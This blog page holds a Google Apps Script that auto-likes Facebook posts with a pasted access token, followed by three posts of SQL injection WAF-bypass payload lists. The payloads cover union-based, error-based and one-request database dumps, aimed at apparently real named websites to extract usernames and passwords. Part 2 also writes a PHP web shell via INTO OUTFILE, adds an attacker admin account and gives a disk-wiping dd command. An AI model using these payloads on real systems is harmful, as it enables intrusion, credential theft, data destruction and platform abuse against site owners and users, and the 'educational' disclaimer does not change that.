Wednesday 12 November 2014

How TO Make Facebook Auto Like Script...

Assalamualaikum..
Hello everyone ? How are you today ?
In this time, i will share trick auto like facebook with google script.
This Script working and safe.

Oke Lets Go !!!
Script like this :

PHP Code:


var robot={
SearchLimit:3,
idGroups:[
"",
],
AllTokens:[{name:"YOUR FB NAME",token:"PASTE YOUR TOKEN HERE"}

]
};

//Using Trigger in Function "modeon()" with Timer per-Minute//

function PullBoss(almt,prop){
var a=UrlFetchApp.fetch(almt,{
muteHttpExceptions:true,
method:"post",
payload:prop
});
var b=Utilities.jsonParse(a.getContentText());
return b;
}
function stir(what){
var a=what.sort(function(){return 0.5-Math.random()});
a.reverse();
a=a.sort(function(){return 0.5-Math.random()});
return a;
}
function modeon(){
var a=stir(robot.AllTokens);
if(a[0].token==""){
robot.tokenNow=a[0].apptkn;
}else{
robot.tokenNow=a[0].token;
}
var p=PullBoss("https://graph.facebook.com/me",{
method:"get",
fields:"id",
access_token:robot.tokenNow
});
if(p&&p.id){
robot.uidNow=p.id;
var b=stir(robot.idGroups);
robot.idGroupSekarang=b[0];
var q=PullBoss("https://graph.facebook.com/me/home",{
method:"get",
fields:"id,likes,comments.fields(id,user_likes)",
limit:robot.SearchLimit,
access_token:robot.tokenNow
});
if(q&&q.data&&q.data.length!=0){
for(x in q.data){
var c="y";
var d=q.data[x];
if(d.likes&&d.likes.data&&d.likes.data.length!=0){
for(y in d.likes.data){
if(d.likes.data[y].id&&d.likes.data[y].id==robot.uidNow){
c="n";
break;
}
}
}
if(c=="n"&&d.comments&&d.comments.data&&d.comments.data.length!=0){
for(z in d.comments.data){
if(!d.comments.data[z].user_likes){
var r=PullBoss("https://graph.facebook.com/"+d.comments.data[z].id+"/likes",{
method:"post",
access_token:robot.tokenNow
});
break;
}
}
}
if(c=="y"){
var r=PullBoss("https://graph.facebook.com/"+d.id+"/likes",{
method:"post",
access_token:robot.tokenNow
});
}
}
}
}
}







Oke..... now you have a Robot Auto like Smile
hope this tutorial will helpfull for everyone.

Watch Video..

How To Make FB auto liker Script by anonymousghost420




Hope You all like it
Read more...
Posted by Pak Defndr at 03:22 0 comments
Labels: ,

Tuesday 11 November 2014

All Type of Advance WAF Bypass Part 3…..

Hi all .This the 3rd and last part of the All Type of Advance WAF Bypass …..So lets start hope you enjoy…….

" union select version(),2,3,4,5,6,7--",
"+union+select+version(),2,3,4,5,6,7--",
"\'+union+select+version(),2,3,4,5,6,7--",
"/**/union/**/select/**/version(),2,3,4,5,6,7/**/",
"/*+*/union/*+*/select/*+*/version(),2,3,4,5,6,7/*+*/",
"/**/union/**/select/**/all/*!50000select*/version(),2,3,4,5,6,7/**/",
"%20and%20%28select%201%29%20=%20%28select%202%29%20union%20all%20select%20version


%28%29%206%207%202%203--",
"+and (select 1) = (select 2) union all select version(),2,3,4,5,6,7--",
"%20and%20%28select%201%29%20=%20%28select%200x414141414141414141414141414141414141414141414141414


1414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414


14141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414


141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414


1414141414141414141414141414141414141414141414141414141414141414141414141414141414141414


141414141414141414141414141414141%29%20union%20all%20select%20


version%28%29%206%207%202%203%204%205%206%207--",
"and (select 1) = (select 0x41414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141


41414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141


4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414


141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414


14141414141414141414141414141414141414141414141414141414141414141414141414141414141)


union all select version(),2,3,4,5,6,7--",
"**/uNiOn/**/SElEcT/**/vErSiOn(),2,3,4,5,6,7/**/",
"/**/union/**/select*/version(),2,3,4,5,6,7--",
"/**/union/**/select*/(0x76657273696f6e2829),2,3,4,5,6,7/**/",
"/*!unIOn*/ select version(),2,3,4,5,6,7--",
"/*--*/union/*--*/select/*--*/version(),2,3,4,5,6,7/*--*/",
"%09union%09select%09version(),2,3,4,5,6,7--",
"%0aunion%0aselect%0aversion(),2,3,4,5,6,7--",
"%0dunion%0dselect%0dversion(),2,3,4,5,6,7--",
" union select \@\@version,7,2,3,4,5,6,7--",
"+union+select+\@\@version,7,2,3,4,5,6,7--",
"\'+union+select+\@\@version,7,2,3,4,5,6,7--",
"/**/union/**/select/**/\@\@version,7,2,3,4,5,6,7/**/"
"/*+*/union/*+*/select/*+*/\@\@version,7,2,3,4,5,6,7/*+*/"
"/**/union/**/select/**/all/*!50000select*/\@\@version,7,2,3,4,5,6,7/**/"
"%20and%20%28select%201%29%20=%20%28select%202%29%20union%20all%20select%20%40%40


version%206%202%203%204%205%206%207--"


"+and (select 1) = (select 2) union all select \@\@version,7,2,3,4,5,6,7--"
"%20and%20%28select%201%29%20=%20%28select%200x4141414141414141414141414141414141414141414141414


14141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414


141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414


141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414


141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414


1414141414141414141414141414141414141%29%20union%20all%20select%20%40%40


version%206%202%203%204%205%206%207--"
"and (select 1) = (select 0x414141414141414141414141414141414141414141414141414141414141414141414141414141414141414


1414141414141414141414141414141414141414141414141414141414141414141414141414141414141414


14141414141414141414141414141414141414141414141414141414141414141414141414141414141414


141414141414141414141414141414141414141414141414141414141414141414141414141414141414


141414141414141414141414141414141414141414141414141414141414141414141414141414141414


1414141414141414141) union all select \@\@version,7,2,3,4,5,6,7--"
"**/uNiOn/**/SElEcT/**/\@\@version,7,2,3,4,5,6,7/**/"
"/**/union/**/select*/\@\@version,7,2,3,4,5,6,7--", "/**/union/**/select*/(0x404076657273696f6e),2,3,4,5,6,7/**/"
"/*!unIOn*/ select \@\@version,7,2,3,4,5,6,7--"
"/*--*/union/*--*/select/*--*/\@\@version,7,2,3,4,5,6,7/*--*/"
"%09union%09select%09%40%40version%206,2,3,4,5,6,7--"
"%0aunion%0aselect%0a%40%40version%206,2,3,4,5,6,7--"
"%0dunion%0dselect%0d%40%40version%206(),2,3,4,5,6,7--"
"+UNion+SeleCT+verSion(),2,3,4,5,6,7--"
"+uUniOn+SeLeCt+veRsion(),2,3,4,5,6,7--"
"+unION+SeLecT+VersiOn(),2,3,4,5,6,7--"
"+UNION+SELECT+VERSION(),2,3,4,5,6,7--"


Note:

All information on this forum is for educational purposes only.


WE are not responsible for any attacks that are carried out on networks, websites or servers.

Read more...
Posted by Pak Defndr at 07:50 0 comments
Labels:

All Type of Advance WAF Bypass Part 2…..

Hi all .This the 2nd part of the All Type of Advance WAF Bypass …..So lets start hope you enjoy.......

SQLI Injction WAF Bypass Methods With Details
--'- : +--+ / : -- - : --+- : /*
) order by 1-- -
') order by 1-- -


')order by 1%23%23


%')order by 1%23%23


Null' order by 100--+


Null' order by 9999--+


')group by 99-- -


'group by 119449-- -


'group/**/by/**/99%23%23


union select ByPassing method


+union+distinct+select+


+union+distinctROW+select+


/**//*!12345UNION SELECT*//**/


/**//*!50000UNION SELECT*//**/


+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+


+/*!u%6eion*/+/*!se%6cect*/+


/**/uniUNIONon/**/aALLll/**/selSELECTect/**/


1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23


/*!50000%55nIoN*/+/*!50000%53eLeCt*/


union /*!50000%53elect*/


%55nion %53elect


+--+Union+--+Select+--+


+UnIoN/*&a=*/SeLeCT/*&a=*/


id=1+’UnI”On’+'SeL”ECT’


id=1+'UnI'||'on'+SeLeCT'


UnIoN SeLeCt CoNcAt(version())--


uNiOn aLl sElEcT


uUNIONnion all sSELECTelect


=================================================================================
:: Buffer Overflow ::
=================================================================================
+And(select 1)=(select 0×414)+union+select+1–


+And(select 1)=(select 0xAAAA)+union+select+1–


+And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141)+


+and (/*!select*/ 1)=(/*!select*/ 0xAA)+


===============================================================================
:: 400 Bad Request ::
===============================================================================
–+%0A


union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –


===============================================================================
null the parameter
===============================================================================
id=-1


id=null


id=1+and+false+


id=9999


id=1 and 0


id==1


id=(-1)


===============================================================================
Group_Concat
===============================================================================
Group_Concat


group_concat()


/*!group_concat*/()


grOUp_ConCat(/*!*/,0x3e,/*!*/)


group_concat(,0x3c62723e)


g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29


CoNcAt()


CONCAT(DISTINCT Version())


concat(,0x3a,)


concat%00()


%00CoNcAt()


/*!50000cOnCat*/(/*!Version()*/)


/*!50000cOnCat*/


/**//*!12345cOnCat*/(,0x3a,)


concat_ws()


concat(0x3a,,0x3c62723e)


/*!concat_ws(0x3a,)*/


concat_ws(0x3a3a3a,version()


CONCAT_WS(CHAR(32,58,32),version(),)


REVERSE(tacnoc)


binary(version())


uncompress(compress(version()))


aes_decrypt(aes_encrypt(version(),1),1)


===============================================================================
To appear column numbr in page put after id
===============================================================================
id=1+and+1=0+union+select+1,2,3,4,5,6


+AND+1=0


/*!aND*/ 1 like 0


+/*!and*/+1=0


+and+2>3+


+and(1)=(0)


and (1)!=(0)


+div+0


Having+1=0


================================================================================
function ByPassing
================================================================================
unhex(hex(value))


cast(value as char)


uncompress(compress(version()))


cast(version() as char)


aes_decrypt(aes_encrypt(version(),1),1)


binary(version())


convert(value using ascii)


================================================================================
avoid source page injection
===============================================================================
concat(?”>,


,@@version,?


“>
?


injection


concat(0x223e,@@version)


concat(0x273e27,version(),0x3c212d2d)


concat(0x223e3c62723e,version(),0x3c696d67207372633d22)


concat(0x223e,@@version,0x3c696d67207372633d22)


concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)


concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)


concat(‘’,@@version,’’)


concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)


concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)


===============================================================================
get version – DB_NAME – user – HOST_NAME – datadir
===============================================================================
version()


convert(version() using latin1)


unhex(hex(version()))


@@GLOBAL.VERSION


(substr(@@version,1,1)=5) :: 1 true 0 fals


# like #


http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 –


===============================================================================
+and substring(version(),1,1)=4


+and substring(version(),1,1)=5


+and substring(version(),1,1)=9


+and substring(version(),1,1)=10


id=1 /*!50094aaaa*/ error


id=1 /*!50095aaaa*/ no error


id=1 /*!50096aaaa*/ error


# like # http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/


id=1 /*!40123 1=1*/–+- no error


id=1 /*!40122rrrr*/ no error


# like # http://www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4
================================================================================
DB_NAME()
===============================================================================
@@database
database()
id=vv()
# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 –
http://www.marinaplast.com/page.php?id=vv()
@@user
user()
user_name()
system_user()
# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 –


HOST_NAME()
@@hostname
@@servername
SERVERPROPERTY()


# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 –
@@datadir
datadir()
# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 –
ASPX
and 1=0/@@version
‘ and 1=0/@@version;–
‘) and 1=@@version–
and 1=0/user;–


Requested method
[DUMP DB in 1 Request]


(select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in


(@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)


(select(@) from (select (@:=0×00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)
===============================================================================
[DUMP DB in 1 Request improve]
===============================================================================


(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and


(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)


like
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.colu mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 –
===============================================================================
#2#
===============================================================================
method like DUMP DB in 1 Request
===============================================================================
concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM


information_schema.tables WHERE table_name>@i order by table_name LIMIT 1)))
like
http://www.mishnetorah.com/shop/details.php?id=-26+union+select+1,2,3,concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a ,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21
===============================================================================
#3#
===============================================================================
databases


(select+count(schema_name) +from+information_schema.schemata)


# like #
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 –


tables
(select+count(table_name) +from+information_schema.tables)
# like #
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 –


columns
(select+count(column_name) +from+information_schema.columns)
# like #
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 –
================================================================================
#4#
==============================================================================
show the table with all her columns


CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))


+FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1–+


like
http://www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1–+
================================================================================
#5#WWWWWWWWWWWAAAAAAAAAAAAAAAAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
===============================================================================
feltered requested


# tables #
group_concat(/*!table_name*/)


+/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -


/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -


/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -
===============================================================================
# columns #
==============================================================================
group_concat(/*!column_name*/)


+/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table


/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table


/*!froM*/ table– -
===============================================================================
#6#
================================================================================
bypass method


(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/


=schEMA())


(select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/


=hex table)


like
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/


=schEMA()),4,5 –
===============================================================================
#7#
===============================================================================
bypass method


unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))


/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)


like
http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)–


===============================================================================
[+] Union Select:
===============================================================================
union /*!select*/+
union/**/select/**/
/**/union/**/select/**/
/**/union/*!50000select*/
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/uniUNIONon/**/selSELECTect/**/
/**/uniUNIONon/**/aALLll/**/selSELECTect/**/
/**//*!union*//**//*!select*//**/
/**/UNunionION/**/SELselectECT/**/
/**//*UnIOn*//**//*SEleCt*//**/
/**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
/**/UNunionION/**/all/**/SELselectECT/**/
/**//*UnIOn*//**/all/**//*SEleCt*//**/
/**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
uni
%20union%20/*!select*/%20
union%23aa%0Aselect
union+distinct+select+
union+distinctROW+select+
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
/*!u%6eion*/+/*!se%6cect*/+
1%’)and(0)union(select(1),version(),3,4,5,6)%23%23%23
/*!50000%55nIoN*/+/*!50000%53eLeCt*/
union /*!50000%53elect*/
+%2F**/+Union/*!select*/
%55nion %53elect
+–+Union+–+Select+–+
+UnIoN/*&a=*/SeLeCT/*&a=*/
uNiOn aLl sElEcT
uUNIONnion all sSELECTelect
union(select(1),2,3)
union (select 1111,2222,3333)
union (/*!/**/ SeleCT */ 11)
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*–*//*!all*//*–*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
id=1+’UnI”On’+’SeL”ECT’
id=1+’UnI’||’on’+SeLeCT’
union select 1–+%0A,2–+%0A,3–+%0A etc ….
===============================================================================
[+] Buffer overflow:
===============================================================================
+And(select 1)=(select 0×414)+union+select+1–
+And(select 1)=(select 0xAAAA)+union+select+1–
+and (/*!select*/ 1)=(/*!select*/ 0xAA)+
+and (/*!select*/ 1)=(/*!select*/ 0×414)+
+And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414?1414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141414141414141414141414141414141414141414141414141414141414141414141414?141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 4141)+
==============================================================================
[+] Group Concat:
===============================================================================
Group_Concat
group_concat()
/*!group_concat*/()
grOUp_ConCat(/*!*/,0x3e,/*!*/)
group_concat(,0x3c62723e)
g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29
CoNcAt()
CONCAT(DISTINCT Version())
concat(,0x3a,)
concat%00()
%00CoNcAt()
/*!50000cOnCat*/(/*!Version()*/)
/*!50000cOnCat*/
/**//*!12345cOnCat*/(,0x3a,)
concat_ws()
concat(0x3a,,0x3c62723e)
/*!concat_ws(0x3a,)*/
concat_ws(0x3a3a3a,version()
CONCAT_WS(CHAR(32,58,32),version(),)
===============================================================================
ERORE BASED
==============================================================================
=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1–


Database


21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


Table_name


and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


Columns


21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


extract date


http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


Notice the limit function in the query
A website can have more than 2 two databases, so increase the limit until you find all database names
Example: limit 0,1 or limit 1,1 or limit 2,1
==============================================================================
Differences:
Error Based Query for Database Extraction:
==============================================================================
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


Double Query for Database Extraction:


and(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,cast(database() as char),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1


and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0×27,cast(schema_name as char),0×27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0×27,cast(table_name as char),0×27,0x7e) FROM information_schema.tables Where
table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1
===============================================================================
WUBI +and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+
===============================================================================


Descarci orice linux live, bootezi dupa el si formatezi cu dd+urandom. De acolo nu mai recupereaza NIMENI ceva.
Code: dd if=/dev/urandom of=/dev/sda bs=1M


I’d say using concat(0xY)


Y being ‘’ in hex
union select concat(version,0x3c7363726970743e616c6572742827706833776c27293c2f7363726970743e)


http://zerocoolhf.altervista.org/level2.php?id=-1%27%20union%20select%20*%20from%28%28select%201%29a%20join%20%28select%20version%28%29%29b%20join


%20%28select%20database%28%29%29c%29–+


union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat(’0x’, hex(‘users’)


=113′+and+0+union+select+1,(SELECT (@) FROM (SELECT(@:=0×00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name,0x27293B3C2F7363726970743E))))x),3–+–


injection in sql database addd new user
INSERT INTO admins (`name`,`password`,`email`) VALUES (‘unix’,'unixunix’,'unix_chro@yahoo.com’)


+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)


CHALLENGES


Code:
=(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(information_schema.columns)where(table_schema=database())and(table_name=0×7365637572697479))–+-
=12+and+false/*!union*/ /*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,


0x3c666f6e7420636f6c6f723d626c75653e3c68323e706833776c,15 from information_schema.tables where table_schema=0x66616272697a696f5f636572697070 LiMit 0,1–
=/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security–
=121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7– -
=121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)–+-
=121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# |
null’+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata– x
===============================================================================
Error Based:
===============================================================================
+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–


or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150)


from rmdsz_user),floor(rand(0)*2)) having min(0) or 1– -
or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 — -


and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))


+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)– x


or 1=convert(int,(@@version))-
+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
+and+(select+1+from+(select+count(*),concat((select(select+concat(c ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)


(42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))–+-
===============================================================================
WAF BYPASS
===============================================================================


=-2/*1337*/UNION/*1337*/(SELECT/*1337*/1337,concat_ws(0x203a20,0x746f7474693933,table_nam e)/*1337*/FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*//*1337*/WHERE/*1337*/TABLE_SCHEMA=database())– -


=2+and(0)+union+distinctROW+select+1,/*!50000CoNcaT*/(0x706833776c,0x3a,table_name) /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()– -


==============================================================================
WUBI – 1,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0×69)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,


0x2020203d3e3e202020,table_name,0x20203a3a3a32020,column_name))))x),3,4–


(select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
(select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)


(select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
================================================================================


+and+1=convert(int,SERVERPROPERTY(‘ProductVersion’))
===============================================================================


test


http://www.mt.ro/nou/articol.php?id=-angajari’+and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+


…………………………………..
http://www.mt.ro/nou/articol.php?id=-angajari’ and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x64625f6d74 limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+


SELECT “ system($_REQUEST['cmd']); ?>”
INTO OUTFILE “full/path/here/cmd.php”




Note:

All information on this forum is for educational purposes only.


WE are not responsible for any attacks that are carried out on networks, websites or servers.

Read more...
Posted by Pak Defndr at 06:28 0 comments
Labels:

All Type of Advance WAF Bypass Part 1.....

Today i will share u a very awesome tutorial that is All Type of Advance WAF Bypass.......So lets start...hope you all like it..

------------------------------Best Bypass WAF------------------------------------


[~] order by [~]
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/


[~] UNION select [~]
/*!00000Union*/ /*!00000Select*/
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion %53elect
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+ #?uNiOn + #?sEleCt
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
